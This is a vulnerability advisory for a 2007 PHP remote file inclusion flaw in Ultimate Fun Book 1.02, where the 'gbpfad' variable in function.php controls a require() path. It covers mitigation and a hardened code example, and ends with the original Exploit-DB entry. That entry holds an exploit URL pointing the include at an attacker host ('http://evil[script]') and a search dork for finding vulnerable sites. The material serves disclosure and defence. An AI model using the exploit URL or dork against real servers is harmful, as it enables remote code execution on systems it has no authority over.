Vendor: Ultimate Fun Book
Found by: kezzap66345
CVSS: 7.5 (HIGH)
Vulnerability type: Remote File Inclusion
CWE: 98 (PHP Remote File Inclusion)
Product Name: Ultimate Fun Book
Affected Version From: Ultimate Fun Book 1.02
Affected Version To: Ultimate Fun Book 1.02
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Published: 2007

Ultimate Fun Book 1.02

Ultimate Fun Book 1.02 builds an include path from the 'gbpfad' variable in 'function.php' without ever assigning or validating it: the script executes require($gbpfad."/config.php"). With PHP's register_globals enabled, $gbpfad is taken directly from the request (?gbpfad=...), so the include path is attacker-controlled. Supplying a URL makes PHP fetch and execute the attacker's PHP code on the target server with the web server's privileges. Because the script appends "/config.php", the attacker either hosts a file at that path or ends the URL with a '?' so that the suffix is sent as a query string instead of a path. Remote inclusion works only when allow_url_fopen (and, on PHP 5.2 and later, allow_url_include) is on.

Mitigation:

Do not derive the include path from request data at all: define the application root once (for example from __DIR__) and require config.php relative to it. If a configurable path is unavoidable, validate it before use: reject values that start with a stream-wrapper scheme (http:, ftp:, php:, data:) or contain '..', resolve the result with realpath(), and check that it lies under the application root. Harden the runtime as well: set register_globals=Off (the directive was removed in PHP 5.4) and allow_url_include=Off (PHP 5.2 and later, default Off), which stops require()/include() from fetching remote URLs even if a similar bug exists elsewhere. No vendor patch is listed for 1.02.
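As an added example (not code from Ultimate Fun Book or its author), the following is a hardened replacement for the vulnerable line in function.php. It assumes PHP 7 or later, that function.php sits in the application root, and that the constant GB_PATH and the helper gb_resolve_config() are new names introduced here:

```php
<?php
// Added example, not the project's own code.
// Hardened replacement for:  require($gbpfad."/config.php");
//
// Root causes in the original line:
//   1. $gbpfad is never assigned by the script, so with register_globals=On
//      it is whatever the request supplies (?gbpfad=...).
//   2. The value goes straight into require(), so a URL is fetched and
//      executed when allow_url_fopen / allow_url_include is on.

// Preferred fix: the application root is fixed at install time, never
// taken from the request. (Assumption: function.php lives in the app root.)
define('GB_PATH', __DIR__);

// Fallback for code that genuinely needs a configurable subdirectory:
// validate the value against the real filesystem instead of trusting it.
function gb_resolve_config(string $base, string $relative): string
{
    // Reject stream-wrapper schemes (http:, ftp:, php:, data:, ...) and
    // path traversal before touching the filesystem.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative) !== 0
        || strpos($relative, '..') !== false) {
        throw new RuntimeException('invalid gbpfad value');
    }

    $root      = realpath($base);
    $candidate = realpath($base . '/' . $relative . '/config.php');

    // realpath() returns false for non-existent paths and collapses
    // symlinks, so a prefix check against the real root is reliable.
    if ($root === false || $candidate === false
        || strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('config.php not found under application root');
    }
    return $candidate;
}

// Even if the value still arrives via the request, it can no longer
// escape GB_PATH or name a remote resource.
$gbpfad = isset($_GET['gbpfad']) ? (string) $_GET['gbpfad'] : '.';
require gb_resolve_config(GB_PATH, $gbpfad);
```

The scheme check happens before realpath() on purpose: realpath() does not understand URL wrappers, so a value such as http://evil/shell.txt? must be rejected as a string, while the realpath() prefix check catches traversal variants the '..' test would miss, such as symlinks pointing outside the root. Pair this with register_globals=Off and allow_url_include=Off in php.ini so that a similar line elsewhere in the code base cannot be reached.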
Source

Exploit-DB raw data:

****Ultimate Fun Book 1.02****
**found by:kezzap66345
**contact= [:(]
**download script=http://www.ultimate-fun-board.de
**dork:Ultimate-Fun-Book 1.02

file:

function.php

code:

<?php
// $gbpfad is never set by the script; with register_globals=On it comes
// straight from the request, so the include path is attacker-controlled.
require($gbpfad."/config.php");

exploit:

http://target/path/function.php?gbpfad=http://evil[script]

*********thanx= x0r0n,str0ke,shakia***********
*****************************************

# milw0rm.com [2007-02-20]